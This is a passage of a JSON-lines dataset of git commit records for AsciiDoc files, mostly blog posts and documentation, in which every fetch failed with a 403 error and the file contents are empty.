bruch.github.com,bluenergy\/bluenergy.github.io,florianhofmann\/florianhofmann.github.io,anwfr\/blog.anw.fr,matthiaselzinga\/matthiaselzinga.github.io,gsera\/gsera.github.io,Joemoe117\/Joemoe117.github.io,harvard-visionlab\/harvard-visionlab.github.io,doochik\/doochik.github.io,CarlosRPO\/carlosrpo.github.io,introspectively\/introspectively.github.io,richard-popham\/richard-popham.github.io,htapia\/htapia.github.io,reversergeek\/reversergeek.github.io,studiocardo\/studiocardo.github.io,juliosueiras\/juliosueiras.github.io,innovation-yagasaki\/innovation-yagasaki.github.io,pysaumont\/pysaumont.github.io,rpawlaszek\/rpawlaszek.github.io,hoernschen\/hoernschen.github.io,YannDanthu\/YannDanthu.github.io,Imran31\/imran31.github.io,yahussain\/yahussain.github.io,djengineerllc\/djengineerllc.github.io,Andy4Craft\/andy4craft.github.io,tofusoul\/tofusoul.github.io,IndianLibertarians\/indianlibertarians.github.io,drleidig\/drleidig.github.io,zestyroxy\/zestyroxy.github.io,Nil1\/Nil1.github.io,Asastry1\/inflect-blog,heberqc\/heberqc.github.io,duarte-fonseca\/duarte-fonseca.github.io,yoanndupuy\/yoanndupuy.github.io,eduardo76609\/eduardo76609.github.io,jlboes\/jlboes.github.io,thefreequest\/thefreequest.github.io,warpcoil\/warpcoil.github.io,nilsonline\/nilson
line.github.io,preteritoimperfecto\/preteritoimperfecto.github.io,gudhakesa\/gudhakesa.github.io,yejodido\/hubpress.io,siarlex\/siarlex.github.io,laposheureux\/laposheureux.github.io,acristyy\/acristyy.github.io,silviu\/silviu.github.io,ronanki\/ronanki.github.io,grzrobak\/grzrobak.github.io,deformat\/deformat.github.io,neuni\/neuni.github.io,flug\/flug.github.io,debbiezhu\/debbiezhu.github.io,chrizco\/chrizco.github.io,KozytyPress\/kozytypress.github.io,TsungmingLiu\/tsungmingliu.github.io,blayhem\/blayhem.github.io,unay-cilamega\/unay-cilamega.github.io,Rackcore\/Rackcore.github.io,nikogamulin\/nikogamulin.github.io,pamasse\/pamasse.github.io,jonathandmoore\/jonathandmoore.github.io,eduardo76609\/eduardo76609.github.io,nikogamulin\/nikogamulin.github.io,thiderman\/daenney.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,MichaelIT\/MichaelIT.github.io,heliomsolivas\/heliomsolivas.github.io,abien\/abien.github.io,acristyy\/acristyy.github.io,Dekken\/dekken.github.io,deformat\/deformat.github.io,zakkum42\/zakkum42.github.io,xquery\/xquery.github.io,scriptindex\/scriptindex.github.io,jtsiros\/jtsiros.github.io,endymion64\/VinJBlog,sidemachine\/sidemachine.github.io,lxjk\/lxjk.github.io,chbailly\/chbailly.github.io,RaphaelSparK\/RaphaelSparK.github.io,Mynor-Briones\/mynor-briones.github.io,ashelle\/ashelle.github.io,emtudo\/emtudo.github.io,neocarvajal\/neocarvajal.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,neurodiversitas\/neurodiversitas.github.io,skeate\/skeate.github.io,Mynor-Briones\/mynor-briones.github.io,pokev25\/pokev25.github.io,fqure\/fqure.github.io,jtsiros\/jtsiros.github.io,tjfy1992\/tjfy1992.github.io,MatanRubin\/MatanRubin.github.io,hfluz\/hfluz.github.io,jakkypan\/jakkypan.github.io,amuhle\/amuhle.github.io,carlomorelli\/carlomorelli.github.io,demohi\/blog,apalkoff\/apalkoff.github.io,devananda\/devananda.github.io,Aerodactyl\/aerodactyl.github.io,in2erval\/in2erval.github.io,jaganz\/jaganz.github.io,theofilis\/theofilis.github.io,plaidshirtguy\/plaidshirtguy.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,anuragsingh31\/anuragsingh31.github.io,crimarde\/crimarde.github.io,camilo28\/camilo28.github.io,reggert\/reggert.github.io,arshakian\/arshakian.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,ioisup\/ioisup.github.io,Zatttch\/zatttch.github.io,NationalShowcase2016CentralMichigan\/nationalshowcase2016cm.github.io,milantracy\/milantracy.github.io,jankolorenc\/jankolorenc.github.io,apalkoff\/apalkoff.github.io,Easter-Egg\/Easter-Egg.github.io,bigkahuna1uk\/bigkahuna1uk.github.io,bahamoth\/bahamoth.github.io,mouseguests\/mouseguests.github.io,cncgl\/cncgl.github.io,akr-optimus\/akr-optimus.github.io,raghakot\/raghakot.github.io,harquail\/harquail.github.io,enderxyz\/enderxyz.github.io,darkfirenze\/darkfirenze.github.io,roamarox\/roamarox.github.io,macchandev\/macchandev.github.io,bencekiraly\/bencekiraly.github.io,topranks\/topranks.github.io,cloudmind7\/cloudmind7.github.com,netrunnerX\/netrunnerx.github.io,modmaker\/modmaker.github.io,pointout\/pointout.github.io,crisgoncalves\/crisgoncalves.github.io,crimarde\/crimarde.github.io,blogforfun\/blogforfun.github.io,enderxyz\/enderxyz.github.io,lifengchuan2008\/lifengchuan2008.github.io,euprogramador\/euprogramador.github.io,YannBertrand\/yannbertrand.github.io,gendalf9\/gendalf9.github.io---hubpress,henryouly\/henryouly.github.io,faldah\/faldah.github.io,laposheureux\/laposheureux.github.io,murilo140891\/murilo140891.github.io,bithunshal\/shalsblog,heberqc\/heberqc.github.io,livehua\/livehua.github.io,nicolasmaurice\/nicol
asmaurice.github.io,gdfuentes\/gdfuentes.github.io,yejodido\/hubpress.io,johannewinwood\/johannewinwood.github.io,live-smart\/live-smart.github.io,endymion64\/endymion64.github.io,FRC125\/FRC125.github.io,htapia\/htapia.github.io,elenampva\/elenampva.github.io,mrcouthy\/mrcouthy.github.io,aleamarat-alhadari\/aleamarat-alhadari.github.io,LihuaWu\/lihuawu.github.io,quangpc\/quangpc.github.io,dbect\/dbect.github.io,susanburgess\/susanburgess.github.io,popurax\/popurax.github.io,mikealdo\/mikealdo.github.io,jarcane\/jarcane.github.io,Oziabr\/Oziabr.github.io,2mosquitoes\/2mosquitoes.github.io,theblankpages\/theblankpages.github.io,emilio2hd\/emilio2hd.github.io,fbruch\/fbruch.github.com,raisedadead\/hubpress.io,qu85101522\/qu85101522.github.io,TinkeringAlways\/tinkeringalways.github.io,eyalpost\/eyalpost.github.io,gongxiancao\/gongxiancao.github.io,buliaoyin\/buliaoyin.github.io,javathought\/javathought.github.io,cdelmas\/cdelmas.github.io,amodig\/amodig.github.io,nickwanhere\/nickwanhere.github.io,velo\/velo.github.io,peter-lawrey\/peter-lawrey.github.io,hyha600\/hyha600.github.io,InformatiQ\/informatiq.github.io,geektic\/geektic.github.io,blahcadepodcast\/blahcadepodcast.github.io,wushaobo\/wushaobo.github.io,hhimanshu\/hhimanshu.github.io,MatanRubin\/MatanRubin.github.io,mkorevec\/mkorevec.github.io,theofilis\/theofilis.github.io,fgracia\/fgracia.github.io,nobodysplace\/nobodysplace.github.io,zubrx\/zubrx.github.io,deunz\/deunz.github.io,ragingsmurf\/ragingsmurf.github.io,ilyaeck\/ilyaeck.github.io,rushil-patel\/rushil-patel.github.io,raisedadead\/hubpress.io,thockenb\/thockenb.github.io,demo-hubpress\/demo,mahrocks\/mahrocks.github.io,Lh4cKg\/Lh4cKg.github.io,parkowski\/parkowski.github.io,der3k\/der3k.github.io,concigel\/concigel.github.io,roamarox\/roamarox.github.io,jarbro\/jarbro.github.io,SingularityMatrix\/SingularityMatrix.github.io","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bithunshal\/shalsblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"410d89e10458a09ec32d27a52725930c69505c9d","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932395ffa757661f30d43e9784cfbfb2f00a2888","subject":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","message":"Update 2016-12-16-Programing-Architecture-And-Math.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_file":"_posts\/2016-12-16-Programing-Architecture-And-Math.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"ec6e7b20e55e9357c3b7a60d0403a988ea84db45","subject":"jenkins folders","message":"jenkins folders\n","repos":"sebastianslutzky\/blog,sebastianslutzky\/blog","old_file":"_posts\/2017-08-04-find-jobs-in-all-jenkins-folders.adoc","new_file":"_posts\/2017-08-04-find-jobs-in-all-jenkins-folders.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebastianslutzky\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3b1abd950124c698733d703429a9232a69deedd","subject":"y2b create post I've Never Tried Anything Like It...","message":"y2b create post I've Never Tried Anything Like It...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-14-Ive-Never-Tried-Anything-Like-It.adoc","new_file":"_posts\/2018-02-14-Ive-Never-Tried-Anything-Like-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"684331d1bcd14de82c8d238b7230abea4fc843e7","subject":"Readme","message":"Readme\n","repos":"zorkian\/aurora","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zorkian\/aurora.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8d0389b69547d7aa4f7e80cc82794f39f66f60b6","subject":"Update 2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","message":"Update 2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"_posts\/2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","new_file":"_posts\/2015-12-13-How-to-export-all-videos-in-MythTV-and-rename-the-files-to-the-movie-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49fb6734dcb3e14759bfd4de660582636c02d908","subject":"Extract SecurityContext Docs","message":"Extract SecurityContext Docs\n\nIssue 
gh-8005\n","repos":"djechelon\/spring-security,djechelon\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,rwinch\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,fhanik\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/servlet\/authentication\/architecture\/security-context.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c70fc0936e601359c4675c3bf9341f8ec8a3a89","subject":"Update 2016-04-08-theosone-calligraphy-tattoos.adoc","message":"Update 2016-04-08-theosone-calligraphy-tattoos.adoc","repos":"redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog","old_file":"_posts\/2016-04-08-theosone-calligraphy-tattoos.adoc","new_file":"_posts\/2016-04-08-theosone-calligraphy-tattoos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/redrabbit-calligraphy\/redrabbit-calligraphy-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8d0742fd38976296a779d68da14202b9dfa5333","subject":"Update 2017-03-28-Episode-93-Circuits-and-Gaps.adoc","message":"Update 2017-03-28-Episode-93-Circuits-and-Gaps.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-03-28-Episode-93-Circuits-and-Gaps.adoc","new_file":"_posts\/2017-03-28-Episode-93-Circuits-and-Gaps.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7ee785e40ffcd3255fc2e364590993575850852","subject":"Update 2017-05-29-Epoch-Code-Generation-Update.adoc","message":"Update 2017-05-29-Epoch-Code-Generation-Update.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-05-29-Epoch-Code-Generation-Update.adoc","new_file":"_posts\/2017-05-29-Epoch-Code-Generation-Update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b45563de39aa5f3ffff2b7ecd2b7cb9d462fe97","subject":"Test single quotes","message":"Test single 
quotes\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Search path\/Overview.adoc","new_file":"Search path\/Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"632cb3aece648928883fc83d4daae8ed08791f67","subject":"docs: add index.adoc","message":"docs: add index.adoc\n\nThis document will mirror the contents of README.adoc, to serve as the\nwebsite home page.\n","repos":"se-edu\/addressbook-level1,se-edu\/addressbook-level1","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level1.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5724a5838cbfbadf81c033e7454455a24e4a4ce4","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3365647dcb6dc484bd92f5ecf70e1845969718f","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"523e98e1a5af05d33ec6022a7e56ffa9d3061ca9","subject":"Add a copy of the LICENSE.adoc in the docs directory.","message":"Add a copy of the LICENSE.adoc in the docs directory.\n","repos":"nanomsg\/nng,nanomsg\/nng,nanomsg\/nng,nanomsg\/nng","old_file":"docs\/LICENSE.adoc","new_file":"docs\/LICENSE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanomsg\/nng.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fade958ea5fedc337769dd9800a63f90d4e69be","subject":"Added magic app doc","message":"Added magic app doc\n","repos":"bjornna\/dips-ckm,DIPSASA\/dips-ckm","old_file":"doc\/magic\/magic.adoc","new_file":"doc\/magic\/magic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bjornna\/dips-ckm.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8942bbaf255ab6371612f7db49762cacc65b334d","subject":"Update 2015-11-23-Deceived-by-Charms.adoc","message":"Update 2015-11-23-Deceived-by-Charms.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_file":"_posts\/2015-11-23-Deceived-by-Charms.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"022af3433d91ead689190cbb084da9650f958129","subject":"y2b create post The 250GB Mega Storage iPhone!","message":"y2b create post The 250GB Mega Storage iPhone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-13-The-250GB-Mega-Storage-iPhone.adoc","new_file":"_posts\/2016-07-13-The-250GB-Mega-Storage-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f93446f357dd5de67ab9397ab37ed907126a871c","subject":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","message":"Update 2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_file":"_posts\/2016-12-08-Nog-lossere-koppeling-met-CDI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b293489f6720b74afeb834f3b90da1fc51e929bf","subject":"Fix #485","message":"Fix #485\n\nadd systemProperties.adoc\n","repos":"OpenHFT\/Chronicle-Wire,OpenHFT\/Chronicle-Wire","old_file":"systemProperties.adoc","new_file":"systemProperties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Wire.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbc770712c3a45220f97ce9e50cd205b4798ca84","subject":"y2b create post How To Instantly Chill Any Drink!","message":"y2b create post How To Instantly Chill Any Drink!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-17-How-To-Instantly-Chill-Any-Drink.adoc","new_file":"_posts\/2016-07-17-How-To-Instantly-Chill-Any-Drink.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e7e8100db9282d7683e7af9a9a6ccb9a51afcc2","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"gtugablue\/gtugablue.github.io,gtugablue\/gtugablue.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gtugablue\/gtugablue.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"774203705762c3af5979ec91dce97a38b655045b","subject":"Create 2017-02-24-ask-lsj.adoc","message":"Create 
2017-02-24-ask-lsj.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-24-ask-lsj.adoc","new_file":"_posts\/2017-02-24-ask-lsj.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"48aa15da1616f656ec1a370b015765eb74724d6b","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"578168a25fea07af48abbd5feca13efe694a5fa8","subject":"Update 2017-08-15-Azure-6.adoc","message":"Update 2017-08-15-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-15-Azure-6.adoc","new_file":"_posts\/2017-08-15-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b59f486bdcc5b5df01f54b5b47e404f4aada91a","subject":"Syntax Interfaces","message":"Syntax Interfaces\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Syntax\/Interfaces.adoc","new_file":"Syntax\/Interfaces.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1d7112ab5a67e428f6f2c95f372483edfeebdac7","subject":"Adding the class outline","message":"Adding the class outline\n","repos":"kcunning\/flask-class,kcunning\/flask-class","old_file":"class-outline.asciidoc","new_file":"class-outline.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kcunning\/flask-class.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d583543bef433f7c288f250d86fdf916ec8925b","subject":"Update 2018-08-15-Loss-Event-Entry.adoc","message":"Update 2018-08-15-Loss-Event-Entry.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2018-08-15-Loss-Event-Entry.adoc","new_file":"_posts\/2018-08-15-Loss-Event-Entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca64f7c64e873730d2dbaea4c9c036550263eeee","subject":"Update 2019-01-31-My-English-Title.adoc","message":"Update 
2019-01-31-My-English-Title.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cb07dd907cbac1b3d1a681cf82266b06db346a0","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bae99672e2a7a88d545d2eb5331c7cd695b44470","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43b75cf2e34e0f3c3fe213772a43d203151d38f6","subject":"Updated README","message":"Updated README\n","repos":"thenewcircle\/class-3272,thenewcircle\/class-3272,thenewcircle\/class-3272","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thenewcircle\/class-3272.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"693ff50ef446e6bdd63a356f9b293909a4b88454","subject":"Changed README","message":"Changed README\n","repos":"UCSolarCarTeam\/Schulich-Delta-OnBoard-Media-Control,UCSolarCarTeam\/Schulich-Delta-OnBoard-Media-Control","old_file":"SDL\/README.adoc","new_file":"SDL\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Schulich-Delta-OnBoard-Media-Control.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"18485002c5274f434bf347b9626a85e42876da69","subject":"Create metrics-newrelic.adoc","message":"Create metrics-newrelic.adoc\n\nFirst draft of New Relic doc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/metrics-newrelic.adoc","new_file":"userguide\/tutorials\/metrics-newrelic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e5557b6919d7b66163dacb256be9c0aee7acef5a","subject":"Update 2016-01-04-JavaScript-Beginner.adoc","message":"Update 
2016-01-04-JavaScript-Beginner.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_file":"_posts\/2016-01-04-JavaScript-Beginner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d5ef4f5596ff004657d3a2145da9cd81130af40e","subject":"Add example document for ifdef change","message":"Add example document for ifdef change\n","repos":"edusantana\/asciidoc-highlight","old_file":"test\/issues\/13.adoc","new_file":"test\/issues\/13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/asciidoc-highlight.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec6e781a918872ea1c05198549498beb0ff82a42","subject":"Update 2016-04-11-Buffer-Overflow-basico.adoc","message":"Update 2016-04-11-Buffer-Overflow-basico.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_file":"_posts\/2016-04-11-Buffer-Overflow-basico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 